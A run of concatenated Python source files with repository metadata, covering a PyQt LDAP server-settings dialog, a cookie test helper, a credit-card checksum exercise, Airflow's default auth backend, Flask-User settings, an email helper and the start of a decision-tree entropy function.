sizePolicy.setHeightForWidth(self.bindAsLabel.sizePolicy().hasHeightForWidth())
self.bindAsLabel.setSizePolicy(sizePolicy)
self.bindAsLabel.setObjectName(_fromUtf8("bindAsLabel"))
self.bindOptGrid.addWidget(self.bindAsLabel, 2, 0, 1, 1)
self.bindAsEdit = QtGui.QLineEdit(self.bindOptGroup)
self.bindAsEdit.setEnabled(False)
self.bindAsEdit.setObjectName(_fromUtf8("bindAsEdit"))
self.bindOptGrid.addWidget(self.bindAsEdit, 2, 1, 1, 1)
self.passwordLabel = QtGui.QLabel(self.bindOptGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.passwordLabel.sizePolicy().hasHeightForWidth())
self.passwordLabel.setSizePolicy(sizePolicy)
self.passwordLabel.setObjectName(_fromUtf8("passwordLabel"))
self.bindOptGrid.addWidget(self.passwordLabel, 3, 0, 1, 1)
self.passwordEdit = QtGui.QLineEdit(self.bindOptGroup)
self.passwordEdit.setEnabled(False)
self.passwordEdit.setEchoMode(QtGui.QLineEdit.Password)
self.passwordEdit.setObjectName(_fromUtf8("passwordEdit"))
self.bindOptGrid.addWidget(self.passwordEdit, 3, 1, 1, 1)
self.gridLayout_8.addLayout(self.bindOptGrid, 0, 0, 1, 1)
spacerItem2 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout_8.addItem(spacerItem2, 1, 0, 1, 1)
self.gridLayout.addWidget(self.bindOptGroup, 5, 2, 1, 1)
self.gridLayout_3.addLayout(self.gridLayout, 0, 1, 2, 1)
self.authIcon = QtGui.QLabel(self.tab)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.authIcon.sizePolicy().hasHeightForWidth())
self.authIcon.setSizePolicy(sizePolicy)
self.authIcon.setMinimumSize(QtCore.QSize(48, 48))
self.authIcon.setText(_fromUtf8(""))
self.authIcon.setObjectName(_fromUtf8("authIcon"))
self.gridLayout_3.addWidget(self.authIcon, 0, 0, 1, 1)
spacerItem3 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout_3.addItem(spacerItem3, 1, 0, 1, 1)
self.tabWidget.addTab(self.tab, _fromUtf8(""))
self.securityTab = QtGui.QWidget()
self.securityTab.setObjectName(_fromUtf8("securityTab"))
self.gridLayout_4 = QtGui.QGridLayout(self.securityTab)
self.gridLayout_4.setObjectName(_fromUtf8("gridLayout_4"))
self.securityIcon = QtGui.QLabel(self.securityTab)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.securityIcon.sizePolicy().hasHeightForWidth())
self.securityIcon.setSizePolicy(sizePolicy)
self.securityIcon.setMinimumSize(QtCore.QSize(48, 48))
self.securityIcon.setText(_fromUtf8(""))
self.securityIcon.setObjectName(_fromUtf8("securityIcon"))
self.gridLayout_4.addWidget(self.securityIcon, 0, 0, 1, 1)
self.securityGridLayout = QtGui.QGridLayout()
self.securityGridLayout.setObjectName(_fromUtf8("securityGridLayout"))
self.securityOptGroup = QtGui.QGroupBox(self.securityTab)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.securityOptGroup.sizePolicy().hasHeightForWidth())
self.securityOptGroup.setSizePolicy(sizePolicy)
self.securityOptGroup.setObjectName(_fromUtf8("securityOptGroup"))
self.gridLayout_9 = QtGui.QGridLayout(self.securityOptGroup)
self.gridLayout_9.setObjectName(_fromUtf8("gridLayout_9"))
self.encryptionBox = QtGui.QComboBox(self.securityOptGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.encryptionBox.sizePolicy().hasHeightForWidth())
self.encryptionBox.setSizePolicy(sizePolicy)
self.encryptionBox.setMinimumSize(QtCore.QSize(0, 20))
self.encryptionBox.setObjectName(_fromUtf8("encryptionBox"))
self.encryptionBox.addItem(_fromUtf8(""))
self.encryptionBox.addItem(_fromUtf8(""))
self.encryptionBox.addItem(_fromUtf8(""))
self.gridLayout_9.addWidget(self.encryptionBox, 0, 0, 1, 1)
self.securityGridLayout.addWidget(self.securityOptGroup, 0, 0, 1, 1)
self.serverCertGroup = QtGui.QGroupBox(self.securityTab)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.serverCertGroup.sizePolicy().hasHeightForWidth())
self.serverCertGroup.setSizePolicy(sizePolicy)
self.serverCertGroup.setObjectName(_fromUtf8("serverCertGroup"))
self.gridLayout_10 = QtGui.QGridLayout(self.serverCertGroup)
self.gridLayout_10.setObjectName(_fromUtf8("gridLayout_10"))
self.validateBox = QtGui.QComboBox(self.serverCertGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.validateBox.sizePolicy().hasHeightForWidth())
self.validateBox.setSizePolicy(sizePolicy)
self.validateBox.setMinimumSize(QtCore.QSize(0, 20))
self.validateBox.setObjectName(_fromUtf8("validateBox"))
self.validateBox.addItem(_fromUtf8(""))
self.validateBox.addItem(_fromUtf8(""))
self.validateBox.addItem(_fromUtf8(""))
self.validateBox.addItem(_fromUtf8(""))
self.gridLayout_10.addWidget(self.validateBox, 0, 0, 1, 1)
self.securityGridLayout.addWidget(self.serverCertGroup, 1, 0, 1, 1)
self.clientCertOptGroup = QtGui.QGroupBox(self.securityTab)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.clientCertOptGroup.sizePolicy().hasHeightForWidth())
self.clientCertOptGroup.setSizePolicy(sizePolicy)
self.clientCertOptGroup.setObjectName(_fromUtf8("clientCertOptGroup"))
self.gridLayout_11 = QtGui.QGridLayout(self.clientCertOptGroup)
self.gridLayout_11.setObjectName(_fromUtf8("gridLayout_11"))
self.clentCertForm = QtGui.QGridLayout()
self.clentCertForm.setObjectName(_fromUtf8("clentCertForm"))
self.useClientCertBox = QtGui.QCheckBox(self.clientCertOptGroup)
self.useClientCertBox.setEnabled(True)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.useClientCertBox.sizePolicy().hasHeightForWidth())
self.useClientCertBox.setSizePolicy(sizePolicy)
self.useClientCertBox.setMinimumSize(QtCore.QSize(0, 20))
self.useClientCertBox.setObjectName(_fromUtf8("useClientCertBox"))
self.clentCertForm.addWidget(self.useClientCertBox, 0, 0, 1, 3)
self.certFileLabel = QtGui.QLabel(self.clientCertOptGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.certFileLabel.sizePolicy().hasHeightForWidth())
self.certFileLabel.setSizePolicy(sizePolicy)
self.certFileLabel.setMinimumSize(QtCore.QSize(0, 20))
self.certFileLabel.setWordWrap(False)
self.certFileLabel.setObjectName(_fromUtf8("certFileLabel"))
self.clentCertForm.addWidget(self.certFileLabel, 1, 0, 1, 1)
self.certFileEdit = QtGui.QLineEdit(self.clientCertOptGroup)
self.certFileEdit.setEnabled(False)
self.certFileEdit.setMinimumSize(QtCore.QSize(0, 20))
self.certFileEdit.setObjectName(_fromUtf8("certFileEdit"))
self.clentCertForm.addWidget(self.certFileEdit, 1, 1, 1, 1)
self.certKeyfileEdit = QtGui.QLineEdit(self.clientCertOptGroup)
self.certKeyfileEdit.setEnabled(False)
self.certKeyfileEdit.setMinimumSize(QtCore.QSize(0, 20))
self.certKeyfileEdit.setObjectName(_fromUtf8("certKeyfileEdit"))
self.clentCertForm.addWidget(self.certKeyfileEdit, 2, 1, 1, 1)
self.certKeyfileButton = QtGui.QToolButton(self.clientCertOptGroup)
self.certKeyfileButton.setEnabled(False)
self.certKeyfileButton.setMinimumSize(QtCore.QSize(0, 20))
self.certKeyfileButton.setObjectName(_fromUtf8("certKeyfileButton"))
self.clentCertForm.addWidget(self.certKeyfileButton, 1, 2, 1, 1)
self.certFileButton = QtGui.QToolButton(self.clientCertOptGroup)
self.certFileButton.setEnabled(False)
self.certFileButton.setMinimumSize(QtCore.QSize(0, 20))
self.certFileButton.setObjectName(_fromUtf8("certFileButton"))
self.clentCertForm.addWidget(self.certFileButton, 2, 2, 1, 1)
self.certKeyfileLabel = QtGui.QLabel(self.clientCertOptGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.certKeyfileLabel.sizePolicy().hasHeightForWidth())
self.certKeyfileLabel.setSizePolicy(sizePolicy)
self.certKeyfileLabel.setMinimumSize(QtCore.QSize(0, 20))
self.certKeyfileLabel.setWordWrap(False)
self.certKeyfileLabel.setObjectName(_fromUtf8("certKeyfileLabel"))
self.clentCertForm.addWidget(self.certKeyfileLabel, 2, 0, 1, 1)
self.gridLayout_11.addLayout(self.clentCertForm, 0, 0, 1, 1)
self.securityGridLayout.addWidget(self.clientCertOptGroup, 2, 0, 1, 1)
spacerItem4 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.securityGridLayout.addItem(spacerItem4, 3, 0, 1, 1)
self.gridLayout_4.addLayout(self.securityGridLayout, 0, 1, 2, 1)
spacerItem5 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout_4.addItem(spacerItem5, 1, 0, 1, 1)
self.tabWidget.addTab(self.securityTab, _fromUtf8(""))
self.vboxlayout.addWidget(self.splitter)
self.line = QtGui.QFrame(ServerDialogDesign)
self.line.setFrameShape(QtGui.QFrame.HLine)
self.line.setFrameShadow(QtGui.QFrame.Sunken)
self.line.setObjectName(_fromUtf8("line"))
self.vboxlayout.addWidget(self.line)
self.bottomHBoxLayout = QtGui.QHBoxLayout()
self.bottomHBoxLayout.setObjectName(_fromUtf8("bottomHBoxLayout"))
spacerItem6 = QtGui.QSpacerItem(0, 0, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.bottomHBoxLayout.addItem(spacerItem6)
self.okButton = QtGui.QPushButton(ServerDialogDesign)
self.okButton.setFocusPolicy(QtCore.Qt.TabFocus)
self.okButton.setAutoDefault(True)
self.okButton.setDefault(True)
self.okButton.setFlat(False)
self.okButton.setObjectName(_fromUtf8("okButton"))
self.bottomHBoxLayout.addWidget(self.okButton)
self.applyButton = QtGui.QPushButton(ServerDialogDesign)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.applyButton.sizePolicy().hasHeightForWidth())
self.applyButton.setSizePolicy(sizePolicy)
self.applyButton.setAutoDefault(False)
self.applyButton.setObjectName(_fromUtf8("applyButton"))
self.bottomHBoxLayout.addWidget(self.applyButton)
self.cancelButton = QtGui.QPushButton(ServerDialogDesign)
self.cancelButton.setAutoDefault(False)
self.cancelButton.setObjectName(_fromUtf8("cancelButton"))
self.bottomHBoxLayout.addWidget(self.cancelButton)
self.vboxlayout.addLayout(self.bottomHBoxLayout)
self.hostLabel.setBuddy(self.hostEdit)
self.portLabel.setBuddy(self.portSpinBox)
self.mechanismLabel.setBuddy(self.mechanismBox)
self.bindAsLabel.setBuddy(self.bindAsEdit)
self.passwordLabel.setBuddy(self.passwordEdit)
self.certFileLabel.setBuddy(self.certFileEdit)
self.certKeyfileLabel.setBuddy(self.certKeyfileEdit)
self.retranslateUi(ServerDialogDesign)
self.tabWidget.setCurrentIndex(0)
QtCore.QObject.connect(self.addBaseDNButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.addBaseDN)
QtCore.QObject.connect(self.addButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.addServer)
QtCore.QObject.connect(self.applyButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.saveServerlist)
QtCore.QObject.connect(self.baseDNBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.addBaseDNButton.setDisabled)
QtCore.QObject.connect(self.baseDNBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.deleteBaseDNButton.setDisabled)
QtCore.QObject.connect(self.baseDNBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.baseDNEdit.setDisabled)
QtCore.QObject.connect(self.baseDNBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.baseDNListWidget.setDisabled)
QtCore.QObject.connect(self.bindAsEdit, QtCore.SIGNAL(_fromUtf8("returnPressed()")), ServerDialogDesign.addBaseDN)
QtCore.QObject.connect(self.cancelButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.reject)
QtCore.QObject.connect(self.certFileButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.certFileDialog)
QtCore.QObject.connect(self.certKeyfileButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.certKeyfileDialog)
QtCore.QObject.connect(self.deleteBaseDNButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.deleteBaseDN)
QtCore.QObject.connect(self.deleteButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.deleteServer)
QtCore.QObject.connect(self.okButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.accept)
QtCore.QObject.connect(self.useClientCertBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.certFileEdit.setEnabled)
QtCore.QObject.connect(self.useClientCertBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.certKeyfileEdit.setEnabled)
QtCore.QObject.connect(self.useClientCertBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.certFileButton.setEnabled)
QtCore.QObject.connect(self.useClientCertBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.certKeyfileButton.setEnabled)
QtCore.QObject.connect(self.bindAnonBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.mechanismBox.setDisabled)
QtCore.QObject.connect(self.bindAnonBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.bindAsEdit.setDisabled)
QtCore.QObject.connect(self.bindAnonBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.passwordEdit.setDisabled)
QtCore.QObject.connect(self.testConnectionButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.testConnection)
QtCore.QMetaObject.connectSlotsByName(ServerDialogDesign)
ServerDialogDesign.setTabOrder(self.addButton, self.deleteButton)
ServerDialogDesign.setTabOrder(self.deleteButton, self.serverListView)
ServerDialogDesign.setTabOrder(self.serverListView, self.tabWidget)
ServerDialogDesign.setTabOrder(self.tabWidget, self.hostEdit)
ServerDialogDesign.setTabOrder(self.hostEdit, self.portSpinBox)
ServerDialogDesign.setTabOrder(self.portSpinBox, self.aliasBox)
ServerDialogDesign.setTabOrder(self.aliasBox, self.baseDNBox)
ServerDialogDesign.setTabOrder(self.baseDNBox, self.baseDNEdit)
ServerDialogDesign.setTabOrder(self.baseDNEdit, self.addBaseDNButton)
ServerDialogDesign.setTabOrder(self.addBaseDNButton, self.deleteBaseDNButton)
ServerDialogDesign.setTabOrder(self.deleteBaseDNButton, self.baseDNListWidget)
ServerDialogDesign.setTabOrder(self.baseDNListWidget, self.bindAnonBox)
ServerDialogDesign.setTabOrder(self.bindAnonBox, self.mechanismBox)
ServerDialogDesign.setTabOrder(self.mechanismBox, self.bindAsEdit)
ServerDialogDesign.setTabOrder(self.bindAsEdit, self.passwordEdit)
ServerDialogDesign.setTabOrder(self.passwordEdit, self.encryptionBox)
ServerDialogDesign.setTabOrder(self.encryptionBox, self.validateBox)
ServerDialogDesign.setTabOrder(self.validateBox, self.useClientCertBox)
ServerDialogDesign.setTabOrder(self.useClientCertBox, self.certFileEdit)
ServerDialogDesign.setTabOrder(self.certFileEdit, self.certKeyfileButton)
ServerDialogDesign.setTabOrder(self.certKeyfileButton, self.certKeyfileEdit)
ServerDialogDesign.setTabOrder(self.certKeyfileEdit, self.certFileButton)
ServerDialogDesign.setTabOrder(self.certFileButton, self.okButton)
ServerDialogDesign.setTabOrder(self.okButton, self.applyButton)
ServerDialogDesign.setTabOrder(self.applyButton, self.cancelButton)
def retranslateUi(self, ServerDialogDesign):
ServerDialogDesign.setWindowTitle(QtGui.QApplication.translate("ServerDialogDesign", "Manage Server List", None, QtGui.QApplication.UnicodeUTF8))
self.addButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "&Add", None, QtGui.QApplication.UnicodeUTF8))
self.deleteButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "&Delete", None, QtGui.QApplication.UnicodeUTF8))
self.testConnectionButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "Test connection", None, QtGui.QApplication.UnicodeUTF8))
self.networkGroup.setTitle(QtGui.QApplication.translate("ServerDialogDesign", "Network options", None, QtGui.QApplication.UnicodeUTF8))
self.hostLabel.setText(QtGui.QApplication.translate("ServerDialogDesign", "Host:", None, QtGui.QApplication.UnicodeUTF8))
self.portLabel.setText(QtGui.QApplication.translate("ServerDialogDesign", "Port:", None, QtGui.QApplication.UnicodeUTF8))
self.LDAPGroup.setTitle(QtGui.QApplication.translate("ServerDialogDesign", "LDAP options", None, QtGui.QApplication.UnicodeUTF8))
self.aliasBox.setText(QtGui.QApplication.translate("ServerDialogDesign", "Follow aliases", None, QtGui.QApplication.UnicodeUTF8))
self.baseDNBox.setText(QtGui.QApplication.translate("ServerDialogDesign", "Use Base DN provided by server", None, QtGui.QApplication.UnicodeUTF8))
self.baseDNLabel.setText(QtGui.QApplication.translate("ServerDialogDesign", "Custom:", None, QtGui.QApplication.UnicodeUTF8))
self.addBaseDNButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "Add", None, QtGui.QApplication.UnicodeUTF8))
self.deleteBaseDNButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "Delete", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.networkTab), QtGui.QApplication.translate("ServerDialogDesign", "Network", None, QtGui.QApplication.UnicodeUTF8))
self.bindOptGroup.setTitle(QtGui.QApplication.translate("ServerDialogDesign", "Bind options", None, QtGui.QApplication.UnicodeUTF8))
self.bindAnonBox.setText(QtGui.QApplication.translate("ServerDialogDesign", "Anonymous bind", None, QtGui.QApplication.UnicodeUTF8))
self.mechanismLabel.setText(QtGui.QApplication.translate("ServerDialogDesign", "Mechanism:", None, QtGui.QApplication.UnicodeUTF8))
self.mechanismBox.setItemText(0, QtGui.QApplication.translate("ServerDialogDesign", "SIMPLE", None, QtGui.QApplication.UnicodeUTF8))
self.mechanismBox.setItemText(1, QtGui.QApplication.translate("ServerDialogDesign", "SASL CRAM-MD5", None, QtGui.QApplication.UnicodeUTF8))
self.mechanismBox.setItemText(2, QtGui.QApplication.translate("ServerDialogDesign", "SASL DIGEST-MD5", None, QtGui.QApplication.UnicodeUTF8))
self.mechanismBox.setItemText(3, QtGui.QApplication.translate("ServerDialogDesign", "SASL EXTERNAL", None, QtGui.QApplication.UnicodeUTF8))
self.mechanismBox.setItemText(4, QtGui.QApplication.translate("ServerDialogDesign", "SASL GSSAPI", None, QtGui.QApplication.UnicodeUTF8))
self.mechanismBox.setItemText(5, QtGui.QApplication.translate("ServerDialogDesign", "SASL Login", None, QtGui.QApplication.UnicodeUTF8))
self.mechanismBox.setItemText(6, QtGui.QApplication.translate("ServerDialogDesign", "SASL Plain", None, QtGui.QApplication.UnicodeUTF8))
self.bindAsLabel.setText(QtGui.QApplication.translate("ServerDialogDesign", "Bind as:", None, QtGui.QApplication.UnicodeUTF8))
self.passwordLabel.setText(QtGui.QApplication.translate("ServerDialogDesign", "Password:", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), QtGui.QApplication.translate("ServerDialogDesign", "Authentication", None, QtGui.QApplication.UnicodeUTF8))
self.securityOptGroup.setTitle(QtGui.QApplication.translate("ServerDialogDesign", "Security options", None, QtGui.QApplication.UnicodeUTF8))
self.encryptionBox.setItemText(0, QtGui.QApplication.translate("ServerDialogDesign", "Unencrypted connection", None, QtGui.QApplication.UnicodeUTF8))
self.encryptionBox.setItemText(1, QtGui.QApplication.translate("ServerDialogDesign", "Transport Layer Security (TLS)", None, QtGui.QApplication.UnicodeUTF8))
self.encryptionBox.setItemText(2, QtGui.QApplication.translate("ServerDialogDesign", "Secure Socket Layer (SSL)", None, QtGui.QApplication.UnicodeUTF8))
self.serverCertGroup.setTitle(QtGui.QApplication.translate("ServerDialogDesign", "Validate server certificate", None, QtGui.QApplication.UnicodeUTF8))
self.validateBox.setItemText(0, QtGui.QApplication.translate("ServerDialogDesign", "Never", None, QtGui.QApplication.UnicodeUTF8))
self.validateBox.setItemText(1, QtGui.QApplication.translate("ServerDialogDesign", "Allow", None, QtGui.QApplication.UnicodeUTF8))
self.validateBox.setItemText(2, QtGui.QApplication.translate("ServerDialogDesign", "Try", None, QtGui.QApplication.UnicodeUTF8))
self.validateBox.setItemText(3, QtGui.QApplication.translate("ServerDialogDesign", "Demand", None, QtGui.QApplication.UnicodeUTF8))
self.clientCertOptGroup.setTitle(QtGui.QApplication.translate("ServerDialogDesign", "Client certificate options", None, QtGui.QApplication.UnicodeUTF8))
self.useClientCertBox.setText(QtGui.QApplication.translate("ServerDialogDesign", "Use client certificates", None, QtGui.QApplication.UnicodeUTF8))
self.certFileLabel.setText(QtGui.QApplication.translate("ServerDialogDesign", "Certificate file:", None, QtGui.QApplication.UnicodeUTF8))
self.certKeyfileButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "...", None, QtGui.QApplication.UnicodeUTF8))
self.certFileButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "...", None, QtGui.QApplication.UnicodeUTF8))
self.certKeyfileLabel.setText(QtGui.QApplication.translate("ServerDialogDesign", "Certificate keyfile:", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.securityTab), QtGui.QApplication.translate("ServerDialogDesign", "Security", None, QtGui.QApplication.UnicodeUTF8))
self.okButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "&OK", None, QtGui.QApplication.UnicodeUTF8))
self.applyButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "Apply", None, QtGui.QApplication.UnicodeUTF8))
self.cancelButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "&Cancel", None, QtGui.QApplication.UnicodeUTF8))
self.cancelButton.setShortcut(QtGui.QApplication.translate("ServerDialogDesign", "Alt+C", None, QtGui.QApplication.UnicodeUTF8))
| khosrow/luma-devel | luma/base/gui/design/ServerDialogDesign.py | Python | gpl-2.0 | 36,277 | 0.003556 |
from cookies.resources.helpers import makeDropCookie, setNoCacheAndCORSHeaders
def main(request, response):
"""Respond to `/cookie/drop/secure` by dropping the two cookie set by
`setSecureTestCookies()`"""
headers = setNoCacheAndCORSHeaders(request, response)
# Expire the cookies, and return a JSON-encoded success code.
headers.append(makeDropCookie(b"alone_secure", False))
headers.append(makeDropCookie(b"alone_insecure", False))
return headers, b'{"success": true}'
| scheib/chromium | third_party/blink/web_tests/external/wpt/cookies/resources/dropSecure.py | Python | bsd-3-clause | 501 | 0.001996 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 18 16:28:59 2017
@author: hase
2. Credit Card Number Check
Suppose you have been hired by MeisterCard to write a function
which checks if a given credit card number is valid.
Your function check(card_number) should take a string card_number as input.
- First, if the string does not follow the format "#### #### #### ####", where
each # is a digit, it should return False.
- Then, if the sum of the digits is divisible by 10 (a "checksum" method),
then the procedure should return True, otherwise it should return False.
For example, if card_number is the string "9384 3495 3297 0123" then although
the format is correct, the digit’s sum is 72 so you should return False.
Hints:
- You can split a string at a specific character using the function split().
parts = my_string.split('a')
- You can test if a string contains only digits with the function isdigit().
only_digits = my_string.isdigit()
"""
# Modules
import numpy as np
# Functions
def invalid():
''' Feedback to user after an invaid input'''
print('Invalid number, please try again!')
def card():
    ''' Prompt the user for a card number and validate it'''
card_num = input('Card number, #### #### #### ####? ')
if len(card_num) == 19:
sanitized = card_num.split(' ')
        if len(sanitized) == 4 and all(len(part) == 4 and part.isdigit()
                                       for part in sanitized):
            # Checksum from the problem statement: digit sum divisible by 10.
            digit_sum = sum(int(digit) for part in sanitized for digit in part)
            if digit_sum % 10 == 0:
                print('Valid number!')
            else: invalid()
        else: invalid()
else: invalid()
return card_num
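# A minimal sketch of the check(card_number) function the exercise statement
# asks for (assumption: "sum of the digits" is the plain digit sum, as in the
# "9384 3495 3297 0123" example whose digits sum to 72):
def check(card_number):
    parts = card_number.split(' ')
    # Format: exactly four groups of four digits.
    if len(parts) != 4 or any(len(p) != 4 or not p.isdigit() for p in parts):
        return False
    # Checksum: the digit sum must be divisible by 10.
    return sum(int(d) for p in parts for d in p) % 10 == 0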
card()
| pandastrail/InfoEng | scripting/exercises/p06_2.py | Python | gpl-3.0 | 1,641 | 0.007932 |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from functools import wraps
client_auth = None
def init_app(app):
pass
def requires_authentication(function):
@wraps(function)
def decorated(*args, **kwargs):
return function(*args, **kwargs)
return decorated
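# Note: this default backend performs no authentication; a view wrapped with
# @requires_authentication is served unchanged, e.g. (hypothetical endpoint):
#
#   @requires_authentication
#   def get_pools():
#       ...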
| danielvdende/incubator-airflow | airflow/api/auth/backend/default.py | Python | apache-2.0 | 1,051 | 0 |
import os
# ***********************************
# Settings common to all environments
# ***********************************
# Application settings
APP_NAME = "Game Valet"
APP_SYSTEM_ERROR_SUBJECT_LINE = APP_NAME + " system error"
# Flask settings
CSRF_ENABLED = True
# Flask-User settings
USER_APP_NAME = APP_NAME
USER_ENABLE_CHANGE_PASSWORD = True # Allow users to change their password
USER_ENABLE_CHANGE_USERNAME = False # Allow users to change their username
USER_ENABLE_CONFIRM_EMAIL = True # Force users to confirm their email
USER_ENABLE_FORGOT_PASSWORD = True # Allow users to reset their passwords
USER_ENABLE_EMAIL = True # Register with Email
USER_ENABLE_REGISTRATION = True # Allow new users to register
USER_ENABLE_RETYPE_PASSWORD = True # Prompt for `retype password` in register and change-password forms
USER_ENABLE_USERNAME = False # Register and Login with username
USER_AFTER_LOGIN_ENDPOINT = 'core.user_page'
USER_AFTER_LOGOUT_ENDPOINT = 'core.home_page'
| teirce/game-valet | app/startup/common_settings.py | Python | bsd-2-clause | 957 | 0.00209 |
from django.template.loader import get_template
from django.template import Context
from django.core.mail import EmailMultiAlternatives
from django.conf import settings
def generate_message_from_template(template, context):
context["STATIC_URL"] = settings.STATIC_URL
# Mandrill is set up to inline the CSS and generate a plaintext copy.
html_message = get_template(template).render(Context(context)).strip()
context["plaintext"] = True
plaintext_message = get_template(template).render(Context(context)).strip()
return html_message, plaintext_message
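# Illustrative usage (template path and context are hypothetical):
#   html, text = generate_message_from_template("email/example.html",
#                                               {"user": user})
#   send_email("user@example.com", "Example subject", html, text)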
def send_email(recipient_list, subject, html_message, plaintext_message=None):
if type(recipient_list) is not list:
recipient_list = [recipient_list]
email = EmailMultiAlternatives(subject=subject, body=plaintext_message, from_email="tapiriik <mailer@tapiriik.com>", to=recipient_list, headers={"Reply-To": "contact@tapiriik.com"})
email.attach_alternative(html_message, "text/html")
    email.send()
| dmschreiber/tapiriik | tapiriik/web/email.py | Python | apache-2.0 | 963 | 0.015576 |
import matplotlib.pyplot as plt
import operator
from math import log
import pickle
def calcShannonEnt(dataSet):
numEntries = len(dataSet)
labelCounts = {}
for fv in dataSet:
currentLabel = fv[-1]
if currentLabel not in labelCounts.keys():
labelCounts[currentLabel] = 0
